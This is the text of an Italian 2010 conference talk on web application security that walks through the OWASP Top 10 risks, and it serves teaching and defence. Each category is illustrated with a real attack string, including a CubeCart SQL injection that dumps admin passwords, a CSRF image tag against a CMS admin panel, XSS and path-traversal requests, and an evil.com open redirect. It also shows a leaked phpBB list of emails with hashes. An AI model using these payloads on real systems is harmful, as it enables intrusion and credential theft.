"For the first time web application vulnerabilities have reached 50 per cent of all code flaws reported" - IBM X-Force Threat Report L'X-force Threats Report ogni sei mesi riporta i trend dell’IT Security. Nell’edizione di Agosto 2010, oltre al Phishing e all’exploiting dei PDF, conferma che il 50% delle vulnerabilità si trova nelle applicazioni web. Che l’applicazione sia open source o closed source, creata da uno sviluppatore freelance o da una azienda di una qualsiasi dimensione, bisogna considerare tutti i fattori di rischio e impatto in caso di compromissione e conoscere i metodi più pratici ed economici per risolvere o mitigare le vulnerabilità. Durante il talk, dopo una breve introduzione sulla sicurezza delle applicazioni web, vedremo - con alcuni esempi pratici e in maniera semplice - come attaccare, come difendersi e quali sono i rischi che corriamo con i 10 rischi più frequenti nel 2010 secondo l’OWASP: dalle Injection (di SQL o LDAP...) ai Redirect, passando per le XSS e CSRF e molto altro.

1. Roma, Sabato 23 ottobre 2010
Web Application Security:
OWASP TOP 10 2010 tra
rischi, attacchi e difese

2. http://www.siatec.net/

3. Tendenze
Quali sono le ultime tendenze
nella sicurezza, nel 2010

4. IBM X-Force Threat Report
“For the first time web
application
vulnerabilities have
reached 50 per cent of
all code flaws reported”

5. IBM X-Force Threat Report
WebApp
55.95%
Altre
44.05%
Percentuale delle vulnerabilità scoperte che interessano Applicazioni
Web

6. IBM X-Force Threat Report
0
5000
10000
15000
20000
25000
1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010
Conteggio cumulativo delle segnalazioni rispetto le Applicazioni Web

7. …ma la TOP 10 non è
sulle vulnerabilità…

8. …è sui rischi…

9. …ma cos’è il rischio!?

10. Rischi e Vulnerabilità Il modello di definizione del
rischio secondo OWASP

11. ISO IEC Guide 73
“rischio: la
combinazione della
probabilità di un
evento e le sue
conseguenze”

13. Renzo Dell’Agnello
“Il rischio è la
possibilità di avere
un danno”

14. Probabilità ImpattoRischio
il rischio

15. Alessandro Sinibaldi
“...deriva dalla
combinazione di un
pericolo (threat) e di
una vulnerabilità”

16. Minaccia VulnerabilitàProbabilità

17. Minaccia

18. Pericolo

19. Agenti di
minaccia

20. Attaccanti

21. Gruppi di
attaccanti

22. Gruppo di
attacco

23. Threat
Agent

24. competenze
necessarie per
compiere l’attacco

25. motivazione
ad attaccare

26. opportunità
di attacco

27. dimensione
del gruppo degli
attaccanti

28. Vulnerabilità

29. Fattori legati
alla
Vulnerabilità

30. Vulnerability

31. facilità di
individuabilità

32. facilità di
sfruttamento

33. consapevolzza
dell’esistenza

34. quanto è facile da
individuare
un’intrusione?

35. Michele Cecioni
“il rischio dipende
anche dall'entità del
danno"

36. Impatto
tecnico
Impatto
sul
Business
Impatto

37. Impatto
tecnico

38. Technical
Impact

39. perdita di
riservatezza

40. perdita di
integrità

41. perdita di
disponibilità

42. perdita di
responsabilità

43. Impatto sul
Business

44. Impatto sulla
“missione”

45. Impatto sulla
missione
dell’organizzazione

46. Business
Impact

47. danno
finanziario

48. danno alla
reputazione

49. non conformità

50. violazione della privacy

51. Agente di
Attacco
Competenza
Motivazione
Opportunità
Dimensioni
Vulnerabilità
Facilità di
Individuabilità
Facilità di
sfruttamento
Conoscenza
della
vulnerabilità
Intrusion
detection
Impatto tecnico
Perdita di
riservatezza
Perdita di
integrità
Perdita di
disponibilità
Perdita di
responsabilità
Impatto sulla
missione
dell’organizzazione
Danno
finanziario
Danno alla
reputazione
Non
conformità
Violazione
della privacy
Il quadro del rischio

52. …e le applicazioni
web?

53. Beni
dell’organizzazione
dove impattano gli
attacchi
Stack Applicativo
Vulnerabilità
Agente
di minaccia
scenario
Agente
di minaccia
Agente
di minaccia

54. …stack applicativo?

55. Lo stack applicativo
Codice Applicativo
Interprete
Web Server
Database
Applicazioni
Sistema Operativo
Rete

56. OWASP TOP 10 2010
Quali sono le tendenze tra
vulnerabilità e rischi nel 2010

57. http://www.example.com/index.php?opt
ion=cookiecheck&return=http://www.ev
il.com/
Joomla <= 1.5

58. A10: Unvalidated
Redirects and
Forwards

59. 40:e3:a5:e0:fd:ae:3f:57:4d:ec:f3:21:
34:b1:84:97:06:6f:
f4:7d:f4:1c:84:cc:bb:1c:1c:e7:7a:7d:
2d:e9:49:60:93:12:
0d:9f:05:8c:8e:f9:cf:e8:9f:fc:15:c0:
6e:e2:fe:e5:07:81: 82:fc Here is the
list of available SSLv2 ciphers:
RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5 EXP-
RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5
RC4-64-MD5
SSLv2

60. A9: Insufficient
Transport Layer
Protection

61. print
print "Target = http://" + blogURL +
"/?p=" + str(postID)
print
while 1:
# Start non authenticated enumeration
request = '/?p=' + str(postID)
conn.request("GET", request, "")
WordPress >= 2.9

62. A8: Failure to
Restrict URL Access

63. captcha-commits@lists.phpbb.com 54a946c47dd434b2
catdb-commits@lists.phpbb.com 6f543db8f086e11f
convertors-commits@lists.phpbb.com c192b68baacc8842
documentation-commits@lists.phpbb.com f85ffcdf9262420c
easymod-commits@lists.phpbb.com 5db5bf75be85191b
kbase-commits@lists.phpbb.com 7c843188ed2f6021
modteam-commits@lists.phpbb.com 533aeefe56bfa30c
prosilver-commits@lists.phpbb.com 859785a9cc724e03
website-commits@lists.phpbb.com 3c79b9864ae5ce43
phpbb-honey-commits@lists.phpbb.com 7e9563750650e4c4
st-tool-commits@lists.phpbb.com 534d4a9b74bb77aa
iit-track-commits@lists.phpbb.com 8f318ffd3a2067c8
packagemanager-commits@lists.phpbb.com 81657892dddafdca
moddocs-commits@lists.phpbb.com 85c837b7f78e5435
phpBB hacked

64. A7: Insecure
Cryptographic
Storage

65. <?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat"
password="tomcat" roles="tomcat"/>
<user username="both"
password="tomcat"
roles="tomcat,role1"/>
<user username="role1"
password="tomcat" roles="role1"/>
</tomcat-users>
Tomcat tomcat-users.xml

66. A6: Security
Misconfiguration

67. <img src="http://www.example.com/s
aurus/admin/change_config.php?grou
p=1&site_name=hacked&slogan=hacked
&meta_title=hacked&meta_descriptio
n=hacked&meta_keywords=hacked&save
=1&flt_keel=1&page_end_html=&timez
one=">
Saurus CMS Admin Panel

68. A5: Cross-Site
Request Forgery
(CSRF)

69. POST
/?m=Profile&func=get_raw_blog_entr
y&user_id=<user_id>&ajax=1&store=0
&aja
x_target=none
HTTP/1.1
Host: wwwb21.tuenti.com
[...]
blog_entry_id=<another_blog_entry_
id>&csfr=<token>
Tuenti Social Network

70. A4: Insecure Direct
Object References

71. POST /CubeCart-
latest/admin.php?_g=maintenance/ba
ckup HTTP/1.1
Host: bld02
Content-Type: multipart/form-data;
boundary=----
WebKitFormBoundaryCpv+NVAHAgHHdvdI
User-Agent:
X_CLUSTER_CLIENT_IP:
Cookie: ccAdmin=+
Accept: */*;q=0.5
Content-Length: 434
CubeCart 4

72. A3: Broken
Authentication and
Session
Management

73. http://www.targetsite.net/
index.php?catid=1>'><Script%
20%0d%0a>Alert
XSS(406115679152)%3B</Scrip>
Cag's CMS

74. A2: Cross-Site
Scripting (XSS)

75. http://www.example.com/cart
/index.php?cat_id=19+union+s
elect+group_concat%28usernam
e,0x3a,password%29,2,3,4,5,6
,7,8+from+cube305_CubeCart_a
dmin_users—
CubeCart 2.0.1

76. A1: Injection

77. …

78. GET
/etc/passwd?format=%%&xss=">
<script>alert('xss');</scrip
t>&traversal=../../&sql='%20
OR%201;
…tratto da un vero TRACE

79. Conclusioni Domande e Riferimenti

81. Riferimenti
IBM X-Force: http://xforce.iss.net/
OWASP Testing Guide: http://www.owasp.org/index.php/OWASP_Testing_Project
OWASP TOP 10 2010:
http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

82. Grazie
Simone Onofri
simone.onofri@techub.it
http://www.techub.it